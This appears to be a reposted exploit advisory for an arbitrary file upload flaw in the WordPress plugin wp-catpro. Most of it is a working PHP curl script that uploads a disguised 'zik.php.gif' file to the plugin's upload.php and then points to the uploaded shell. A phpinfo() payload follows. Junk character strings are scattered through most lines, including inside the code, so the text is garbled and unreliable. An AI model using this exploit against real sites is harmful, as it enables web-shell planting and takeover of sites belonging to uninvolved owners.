WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
$ B& v+ ~* v4 c- Y  d
( f5 ?$ v* m- P4 L作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
6 q/ U- \2 f" w0 ]5 U$ Q####
  S+ ]9 }$ X$ B
, S, ^" d2 M* ?0 m, v#=> Exploit 信息:
------------------
& d7 V  O  F' |) e6 w- m# S+ w* O# 攻击者可以上传 file/shell.php.gif
9 w) o4 F  I. R4 T5 m# ("jpg", "gif", "png")  // Allowed file extensions
: _+ X" [! `2 G; @5 R& A# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
6 z" `& X& \# x1 s+ V" r# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
9 Z. C/ W- b( ~2 ]$ T1 Y) z------------------
1 h6 ~, a" M% A
3 i# c( C3 V- y: o  t# H9 r. }7 ^8 }" G#=> Exploit
: K( d+ l8 W$ \  M" v-----------
<?php

9 U+ X. N3 Q+ ?* x; w0 A; ~$uploadfile="zik.php.gif";
) G/ X3 c; ]" S( s7 m( c1 @$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
* [. n1 w' T' W2 z$ Hcurl_setopt($ch, CURLOPT_POSTFIELDS,
, A# k) K. D  Y% c8 varray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
7 V4 d5 k# x' K' M
( [- b8 T3 W1 q& y( h* iprint "$postResult";

  M) J" l0 a- I+ ^! ?' ~Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
& [0 G1 T1 f' _+ N$ q  R0 b4 @<?php
7 R& l5 |- t1 N" cphpinfo();
4 D. `- R: n! r4 g% \6 u& u) a?>